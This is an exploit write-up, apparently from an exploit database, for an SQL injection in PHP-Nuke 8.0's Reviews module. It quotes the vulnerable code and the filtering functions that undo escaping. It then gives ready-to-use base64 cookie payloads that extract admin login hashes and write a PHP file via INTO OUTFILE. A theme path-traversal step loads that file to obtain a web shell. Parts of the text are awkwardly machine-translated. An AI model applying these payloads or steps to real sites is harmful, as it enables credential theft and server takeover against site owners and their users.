PHP-Nuke 8.0 SQL Injection / Remote Shell

`====================================  
PHP-Nuke <= 8.0 SQL-Inj3ct0r Exploit  
====================================  
  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0   
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 0  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1  
  
#[+] Discovered By : Inj3ct0r  
#[+] Site : Inj3ct0r.com  
#[+] support e-mail : submit[at]inj3ct0r.com  
  
  
Product: PHP-Nuke   
Version: 8.0   
site: rus-phpnuke.com  
  
/modules/Reviews/index.php  
  
Vulnerable code:  
  
  
$uname = filter($cookie[1], "nohtml");   
$id = intval($id);   
$score = intval($score);   
if (is_user($user)) {   
$krow = $db->sql_fetchrow($db->sql_query("SELECT karma FROM ".$user_prefix."_users WHERE username='$uname'"));   
if ($krow['karma'] == 2) {   
$db->sql_query("insert into ".$prefix."_reviews_comments_moderated values (NULL, '$id', '$uname', now(), '$comments', '$score')");   
include("header.php");   
title(""._MODERATEDTITLE."");   
OpenTable();   
echo "<center>"._COMMENTMODERATED."";   
echo "<br><br><a href=\"modules.php?name=$module_name&rop=showcontent&id=$id\">"._MODERATEDTITLE."</a>";   
CloseTable();   
include("footer.php");   
die();   
} elseif ($krow['karma'] == 3) {   
Header("Location: modules.php?name=$module_name&rop=showcontent&id=$id");   
die();   
}   
}   
$db->sql_query("insert into ".$prefix."_reviews_comments values (NULL, '$id', '$uname', now(), '$comments', '$score')");   
  
  
------------------------  
  
Here there once 2 sql-inj3ct0r, to select and insert queries, after raskadirovki Cookie is sleshirovanie data, but in this code snippet, data from $ cookie [1] fall into the filter  
  
------------------------  
  
function filter($what, $strip="", $save="", $type="") {   
if ($strip == "nohtml") {   
$what = check_html($what, $strip);   
// $what = htmlentities(trim($what), ENT_QUOTES);   
// If the variable $what doesn't comes from a preview screen should be converted   
if ($type != "preview" AND $save != 1) {   
$what = html_entity_decode($what, ENT_QUOTES);   
}   
}   
if ($save == 1) {   
$what = check_words($what);   
$what = check_html($what, $strip);   
if (!get_magic_quotes_gpc()) {   
$what = addslashes($what);   
}   
} else {   
$what = stripslashes(FixQuotes($what,$strip));   
$what = check_words($what);   
$what = check_html($what, $strip);   
}   
return($what);   
}   
  
-------------------------------  
  
and thence to filter check_html  
  
-------------------------------  
  
  
function check_html ($str, $strip="") {   
/* The core of this code has been lifted from phpslash */   
/* which is licenced under the GPL. */   
include("config.php");   
if ($strip == "nohtml")   
$AllowableHTML=array('');   
$str = stripslashes($str);   
$str = eregi_replace("<[[:space:]]*([^>]*)[[:space:]]*>",'<\\1>', $str);   
// Delete all spaces from html tags .   
$str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?[[:space:]]*([^\" >]*)[[:space:]]*\"?[^>]*>",'<a href="\\1">', $str);   
// Delete all attribs from Anchor, except an href, double quoted.   
$str = eregi_replace("<[[:space:]]* img[[:space:]]*([^>]*)[[:space:]]*>", '', $str);   
// Delete all img tags   
$str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?javascript[[:punct:]]*\"?[^>]*>", '', $str);   
// Delete javascript code from a href tags -- Zhen-Xjell @ http://nukecops.com   
$tmp = "";   
while (ereg("<(/?[[:alpha:]]*)[[:space:]]*([^>]*)>",$str,$reg)) {   
$i = strpos($str,$reg[0]);   
$l = strlen($reg[0]);   
if ($reg[1][0] == "/") $tag = strtolower(substr($reg[1],1));   
else $tag = strtolower($reg[1]);   
if ($a = $AllowableHTML[$tag])   
if ($reg[1][0] == "/") $tag = "</$tag>";   
elseif (($a == 1) || ($reg[2] == "")) $tag = "<$tag>";   
else {   
# Place here the double quote fix function.   
$attrb_list=delQuotes($reg[2]);   
// A VER   
//$attrb_list = ereg_replace("&","&",$attrb_list);   
$tag = "<$tag" . $attrb_list . ">";   
} # Attribs in tag allowed   
else $tag = "";   
$tmp .= substr($str,0,$i) . $tag;   
$str = substr($str,$i+$l);   
}   
$str = $tmp . $str;   
return $str;   
exit;   
/* Squash PHP tags unconditionally */   
$str = ereg_replace("<\?","",$str);   
return $str;   
}   
  
  
where shielding escaped successfully removed, so it becomes possible to implement our sql code, through the cheekbones to select the data output can not, therefore, used inj3ct0r to insert  
Come in  
  
/modules.php?name=Reviews&rop=showcontent&id=1  
  
choose any review, click "Insert comment"  
throw in a cookie  
  
base64_encode(yourid:yournick',1,(select concat(aid,0x3a,pwd) from nuke_authors),3)/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)  
  
Click submit, as a result we get the login: hash admin  
  
But over the cheekbones to select when file_priv can fill shell, throw in a cookie:  
  
base64_encode(yourid:yournick' union select 0x3c3f20706870696e666f28293b203f3e into outfile '/tmp/theme.php'/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)  
  
  
Then the path can not disclose, pour in tmp, and then simply poured through the shell templetes, for this go to /modules.php?Name=Your_Account&op=chgtheme  
  
Human SORS, where it is written the name of the topic, in my case, value = RusNuke2003 write:  
  
<option value="/../../../../../../../tmp/" >RusNuke2003  
  
save, get shell =))  
  
  
----------------------------------------------  
  
ThE End =] Visit my proj3ct :  
  
http://inj3ct0r.com  
http://inj3ct0r.org  
http://inj3ct0r.net  
  
  
# ~ - [ [ : Inj3ct0r : ] ]`